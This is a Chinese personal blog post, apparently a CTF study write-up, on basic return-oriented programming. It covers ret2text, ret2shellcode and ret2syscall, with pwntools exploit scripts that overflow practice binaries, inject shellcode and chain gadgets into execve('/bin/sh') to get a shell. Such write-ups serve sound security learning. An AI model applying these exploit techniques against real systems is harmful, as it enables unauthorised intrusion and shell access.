



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">
  <meta name="google-site-verification" content="tcK6frO9MMMjv-s9v_SHFiAvsW8YHyINmZlIiYn3a4g" />


<link rel="alternate" type="application/rss+xml" title="skyの博客" href="https://3cly.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="skyの博客" href="https://3cly.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="skyの博客" href="https://3cly.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="二进制" />


<link rel="canonical" href="https://3cly.github.io/2022/12/15/%E5%9F%BA%E6%9C%ACROP%E5%AD%A6%E4%B9%A0/">



  <title>
基本ROP学习 - 基本ROP学习 |
静かな港 = skyの博客 = 从来如此,便对么?</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">基本ROP学习
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2022-12-15 21:12:06">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2022-12-15T21:12:06+08:00">2022-12-15</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>2.1k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>2 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">静かな港</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://pic.imgdb.cn/item/64a27d991ddac507ccc58c07.jpg"></li>
          <li class="item" data-background-image="https://pic.imgdb.cn/item/64a27da01ddac507ccc59a09.jpg"></li>
          <li class="item" data-background-image="https://pic.imgdb.cn/item/63ddecc64757feff33b7e519.png"></li>
          <li class="item" data-background-image="https://pic.imgdb.cn/item/64a27d8a1ddac507ccc570ab.jpg"></li>
          <li class="item" data-background-image="https://pic.imgdb.cn/item/63bec1e8be43e0d30e4f58f9.png"></li>
          <li class="item" data-background-image="https://pic.imgdb.cn/item/640da85ef144a0100749f168.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/%E5%9F%BA%E6%9C%ACROP%E5%AD%A6%E4%B9%A0/" itemprop="item" rel="index" title="分类于 基本ROP学习"><span itemprop="name">基本ROP学习</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://3cly.github.io/2022/12/15/%E5%9F%BA%E6%9C%ACROP%E5%AD%A6%E4%B9%A0/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.png">
    <meta itemprop="name" content="sky">
    <meta itemprop="description" content="从来如此,便对么?, 一只菜狗的博客">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="skyの博客">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>用 p64 () 发送数据时，是发送的字节流，也就是比特流（二进制流）。</p>
<h1 id="基本-rop学习"><a class="markdownIt-Anchor" href="#基本-rop学习">#</a> 基本 ROP 学习</h1>
<p>背景：NX 保护的开启 (No-eXecute, 不可执行保护）</p>
<p>核心思想：栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。</p>
<p>ROP 攻击一般得满足如下条件:</p>
<ul>
<li>
<p>程序存在溢出，并且可以控制返回地址。</p>
</li>
<li>
<p>可以找到满足条件的 gadgets 以及相应 gadgets 的地址。</p>
<h2 id="ret2text"><a class="markdownIt-Anchor" href="#ret2text">#</a> ret2text</h2>
</li>
</ul>
<p>ret2text 即控制程序执行程序本身已有的的代码 (.text)。</p>
<h3 id="pwn1_1"><a class="markdownIt-Anchor" href="#pwn1_1">#</a> pwn1_1</h3>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221220132950.png" alt="image.png"></p>
<p>只开了 nx 保护</p>
<p><code>read()</code>  函数读的数据长度比输入的字符 <code>&amp;buf</code>  的长度长，能够造成溢出</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221215211911.png" alt="image.png"><br>
<img data-src="/images/QQ%E5%9B%BE%E7%89%8720221215212110.png" alt="image.png"></p>
<p>发现后门函数</p>
<p>利用 ida 计算偏移量</p>
<p>用返回地址减去起始地址求得偏移量，这里 buf 相对于返回地址得偏移量为 0x18</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221220135857.png" alt="image.png"></p>
<p>exp 直通后门</p>
<figure class="highlight python"><figcaption data-lang="python"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token comment"># coding=utf-8</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="3"></td><td><pre>p<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">"gxh191.top"</span><span class="token punctuation">,</span><span class="token number">25537</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="4"></td><td><pre>sh_addr<span class="token operator">=</span><span class="token number">0x40119E</span></pre></td></tr><tr><td data-num="5"></td><td><pre>payload<span class="token operator">=</span><span class="token string">b"a"</span><span class="token operator">*</span><span class="token number">0x18</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>sh_addr<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre>p<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="7"></td><td><pre>p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="8"></td><td><pre>p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure><p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221215212337.png" alt="image.png"></p>
<h3 id="pwn2_1"><a class="markdownIt-Anchor" href="#pwn2_1">#</a> pwn2_1</h3>
<p>先 checksec 查看保护  只开了 nx 保护<br>
<img data-src="/images/QQ%E5%9B%BE%E7%89%8720221215212443.png" alt="image.png"></p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221215212710.png" alt="image.png"></p>
<p>也是栈溢出   read 函数 读 buf 大小 0x1000<br>
 但是多了个 if 和 strlen 需要用 \0 来控制字符串长度避免 exit 了<br>
这是因为 strlen 遇到 \0 会停止读取，在写脚本时将填充 buf 的字符换成’\0’即可绕过 strlen 的限制</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221220133554.png" alt="image.png"><br>
<img data-src="/images/QQ%E5%9B%BE%E7%89%8720221215212829.png" alt="image.png"><br>
<img data-src="/images/QQ%E5%9B%BE%E7%89%8720221215212857.png" alt="image.png"><br>
 直接跳转到 b4ckd00r 函数会退出运行。因此 2-1 并不能像 1-1 一样直接跳转到 b4ckd00r 就行了 而是需要通过栈溢出跳转到 path<br>
 脚本如下</p>
<figure class="highlight python"><figcaption data-lang="python"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="2"></td><td><pre>context<span class="token punctuation">(</span>arch <span class="token operator">=</span> <span class="token string">'amd64'</span><span class="token punctuation">,</span> os <span class="token operator">=</span> <span class="token string">'linux'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="3"></td><td><pre>p<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'gxh191.top'</span><span class="token punctuation">,</span> <span class="token number">25540</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="4"></td><td><pre>payload<span class="token operator">=</span><span class="token string">b'\0'</span><span class="token operator">*</span><span class="token number">16</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x4011EF</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="5"></td><td><pre>p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre>p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure><h2 id="ret2shellcode"><a class="markdownIt-Anchor" href="#ret2shellcode">#</a> ret2shellcode</h2>
<p>ret2shellcode，即控制程序执行 shellcode 代码。</p>
<h3 id="pwn2_2"><a class="markdownIt-Anchor" href="#pwn2_2">#</a> pwn2_2</h3>
<p>checksec 查看保护</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221220132950.png" alt="image.png"></p>
<p>典中典之 NX</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221220140613.png" alt="image.png"></p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221220140735.png" alt="image.png"></p>
<p>无现成后门可用</p>
<p><code>mprotect((&amp;phone_number &amp; 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7);</code></p>
<p>发现 mprotect 函数修改了 phone_number bss 段的权限</p>
<p>第三个参数为 7 表示<strong>可读可写可执行</strong></p>
<p>即思路是将 shellcode 写入 phone_number bss 段 再通过栈溢出来执行</p>
<figure class="highlight python"><figcaption data-lang="python"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="2"></td><td><pre>context<span class="token punctuation">(</span>arch <span class="token operator">=</span> <span class="token string">'amd64'</span><span class="token punctuation">,</span> os <span class="token operator">=</span> <span class="token string">'linux'</span><span class="token punctuation">,</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="3"></td><td><pre>io<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'gxh191.top'</span><span class="token punctuation">,</span> <span class="token number">25542</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="4"></td><td><pre>shellcode<span class="token operator">=</span>asm<span class="token punctuation">(</span>shellcraft<span class="token punctuation">.</span>sh<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="5"></td><td><pre>payload<span class="token operator">=</span><span class="token string">b'a'</span><span class="token operator">*</span><span class="token number">16</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x4040A0</span><span class="token operator">+</span><span class="token number">0x18</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x4040A0</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="6"></td><td><pre>io<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'ber:'</span><span class="token punctuation">,</span>shellcode<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="7"></td><td><pre>io<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span><span class="token string">'uf:'</span><span class="token punctuation">,</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="8"></td><td><pre>io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure><h2 id="ret2syscall"><a class="markdownIt-Anchor" href="#ret2syscall">#</a> ret2syscall</h2>
<h3 id="原理"><a class="markdownIt-Anchor" href="#原理">#</a> 原理</h3>
<p>ret2syscall，即控制程序执行系统调用，获取 shell。</p>
<p>pop eax 将栈顶数据弹到 eax 里面</p>
<h4 id="以ctfwiki上的例子做一下"><a class="markdownIt-Anchor" href="#以ctfwiki上的例子做一下">#</a> 以 ctfwiki 上的例子做一下</h4>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227152927.png" alt="image.png"></p>
<p>NX 保护</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227152726.png" alt="image.png"></p>
<p>gets 栈溢出先用 cyclic 获取偏移量</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227153509.png" alt="image.png"></p>
<p>得偏移量 112</p>
<p>应用程序调用系统调用的过程是：</p>
<pre><code>把系统调用的编号存入 EAX；
把函数参数存入其它通用寄存器；
触发 0x80 号中断（int 0x80）。
[sys_execve系统调用号是11也就是0xb]
</code></pre>
<p><strong>Syscall 的函数调用规范为</strong>： <code>execve(“/bin/sh”, 0,0)</code> ;</p>
<p>所以，<strong>eax</strong> = 0xb | <strong>ebx</strong> = address of ‘/bin/sh’ | <strong>ecx</strong> = 0 | <strong>edx</strong> = 0</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227153810.png" alt="image.png"></p>
<p>payload=b’a’*112+p32(pop_rax_ret)+p32(0xb)+p32(pop_other_ret)+p32(0)+p32(0)+p32(bin_addr)+p32(int_addr)</p>
<p>用 ROPgadget 获取一些命令片段的地址</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227154902.png" alt="image.png"></p>
<p>先找 eax</p>
<p><code>0x080bb196 : pop eax ; ret</code>  这个可以用</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227155404.png" alt="image.png"></p>
<p><code>0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</code></p>
<p>可以用 3 个寄存器都有了</p>
<p>再找’/bin/sh’字符串和 int 0x80</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227155727.png" alt="image.png"></p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227155827.png" alt="image.png"></p>
<p>都找到了 可以写 exp 了</p>
<p><code>from pwn import * p=process(' ./rop') int_addr=0x8049421 bin_addr=0x80be408 pop_other_ret=0x806eb90 pop_eax_ret=0x80bb196 payload=b'a'*112+p32(pop_eax_ret)+p32(0xb)+p32(pop_other_ret)+p32(0)+p32(0)+p32(bin_addr)+p32(int_addr) p.sendline(payload) p.interactive()</code></p>
<p>运行一下 成功本地 get shell</p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221227161008.png" alt="image.png"></p>
<p><img data-src="/images/QQ%E5%9B%BE%E7%89%8720221211175742.gif" alt="image.gif"></p>
<link rel="stylesheet" href="/css/spoiler.css" type="text/css"><script src="/js/spoiler.js" type="text/javascript" async></script>
      <div class="tags">
          <a href="/tags/%E4%BA%8C%E8%BF%9B%E5%88%B6/" rel="tag"><i class="ic i-tag"></i> 二进制</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-02-04 15:17:00" itemprop="dateModified" datetime="2023-02-04T15:17:00+08:00">2023-02-04</time>
  </span>
  <span id="2022/12/15/基本ROP学习/" class="item leancloud_visitors" data-flag-title="基本ROP学习" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>sky <i class="ic i-at"><em>@</em></i>skyの博客
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://3cly.github.io/2022/12/15/%E5%9F%BA%E6%9C%ACROP%E5%AD%A6%E4%B9%A0/" title="基本ROP学习">https://3cly.github.io/2022/12/15/基本ROP学习/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/12/15/%E5%8D%9A%E5%AE%A2%E7%AE%80%E4%BB%8B/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;pic.imgdb.cn&#x2F;item&#x2F;63ddebc54757feff33b67d1a.jpg" title="博客简介">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> Hexo</span>
  <h3>博客简介</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/12/30/%E2%80%9CPLT%E8%A1%A8%E4%B8%8EGOT%E8%A1%A8%E3%81%AE%E5%BB%B6%E8%BF%9F%E7%BB%91%E5%AE%9A%E6%9C%BA%E5%88%B6%E5%AD%A6%E4%B9%A0%E2%80%9D/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;pic.imgdb.cn&#x2F;item&#x2F;640da934f144a010074b72ea.jpg" title="PLT表与GOT表の延迟绑定机制学习">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> 基本ROP学习</span>
  <h3>PLT表与GOT表の延迟绑定机制学习</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC-rop%E5%AD%A6%E4%B9%A0"><span class="toc-number">1.</span> <span class="toc-text"> 基本 ROP 学习</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2text"><span class="toc-number">1.1.</span> <span class="toc-text"> ret2text</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#pwn1_1"><span class="toc-number">1.1.1.</span> <span class="toc-text"> pwn1_1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#pwn2_1"><span class="toc-number">1.1.2.</span> <span class="toc-text"> pwn2_1</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2shellcode"><span class="toc-number">1.2.</span> <span class="toc-text"> ret2shellcode</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#pwn2_2"><span class="toc-number">1.2.1.</span> <span class="toc-text"> pwn2_2</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2syscall"><span class="toc-number">1.3.</span> <span class="toc-text"> ret2syscall</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.3.1.</span> <span class="toc-text"> 原理</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%A5ctfwiki%E4%B8%8A%E7%9A%84%E4%BE%8B%E5%AD%90%E5%81%9A%E4%B8%80%E4%B8%8B"><span class="toc-number">1.3.1.1.</span> <span class="toc-text"> 以 ctfwiki 上的例子做一下</span></a></li></ol></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li class="active"><a href="/2022/12/15/%E5%9F%BA%E6%9C%ACROP%E5%AD%A6%E4%B9%A0/" rel="bookmark" title="基本ROP学习">基本ROP学习</a></li><li><a href="/2022/12/30/%E2%80%9CPLT%E8%A1%A8%E4%B8%8EGOT%E8%A1%A8%E3%81%AE%E5%BB%B6%E8%BF%9F%E7%BB%91%E5%AE%9A%E6%9C%BA%E5%88%B6%E5%AD%A6%E4%B9%A0%E2%80%9D/" rel="bookmark" title="PLT表与GOT表の延迟绑定机制学习">PLT表与GOT表の延迟绑定机制学习</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="sky"
      data-src="/images/avatar.png">
  <p class="name" itemprop="name">sky</p>
  <div class="description" itemprop="description">一只菜狗的博客</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">22</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">4</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">2</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tLzNjbHk=" title="https:&#x2F;&#x2F;github.com&#x2F;3cly"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

    
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

    
  <li class="item">
    <a href="/link/" rel="section"><i class="ic i-magic"></i>links</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/12/15/%E5%8D%9A%E5%AE%A2%E7%AE%80%E4%BB%8B/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/12/30/%E2%80%9CPLT%E8%A1%A8%E4%B8%8EGOT%E8%A1%A8%E3%81%AE%E5%BB%B6%E8%BF%9F%E7%BB%91%E5%AE%9A%E6%9C%BA%E5%88%B6%E5%AD%A6%E4%B9%A0%E2%80%9D/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/03/19/JAVA%E5%AD%A6%E4%B9%A0/" title="JAVA学习">JAVA学习</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/01/07/CSAPP%E3%81%AE%E5%AD%A6%E7%BF%92%E8%A8%98%E9%8C%B2/" title="CSAPPの学習記録">CSAPPの学習記録</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/02/04/hgame2023%20%E9%83%A8%E5%88%86%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/" title="hgame2023 部分做题记录">hgame2023 部分做题记录</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/02/26/VNCTF/" title="VNCTF">VNCTF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/02/26/shellcode&&vm/" title="shellcode&amp;&amp;vm">shellcode&&vm</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/06/18/DSACTF%E9%80%86%E5%90%91%E4%B8%93%E9%A1%B9/" title="DSACTF逆向专项">DSACTF逆向专项</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/04/02/%E5%87%A0%E9%81%93RE%E9%A2%98/" title="几道RE题">几道RE题</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/04/25/pixel-4a-root/" title="pixel 4a root">pixel 4a root</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/07/03/Google-CTF-2023/" title="Google CTF 2023">Google CTF 2023</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0/" title="分类于 学习">学习</a>
</div>

    <span><a href="/2023/05/28/%E5%8C%BA%E5%9D%97%E9%93%BE%E6%8A%80%E6%9C%AF%E4%B8%8E%E7%A0%94%E7%A9%B6%E8%BF%9B%E5%B1%95/" title="区块链技术与研究进展">区块链技术与研究进展</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2022 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">sky @ 静かな港</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">85k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">1:18</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/12/15/基本ROP学习/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
